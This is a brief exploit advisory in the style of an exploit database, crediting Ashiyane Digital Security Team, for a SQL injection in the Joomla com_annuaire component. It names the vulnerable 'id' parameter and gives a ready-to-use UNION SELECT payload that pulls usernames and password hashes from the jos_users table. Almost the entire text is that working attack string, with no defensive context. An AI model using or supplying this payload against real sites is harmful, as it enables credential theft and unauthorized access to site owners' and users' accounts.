SQL Injection Vulnerability:
[+] vuln: http://127.0.0.1/index.php?option=com_annuaire&view=annuaire&type=cat&id=[SQLi]
[+] Exploit: /**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13/**/from/**/jos_users--
Submitter: Ashiyane Digital Security Team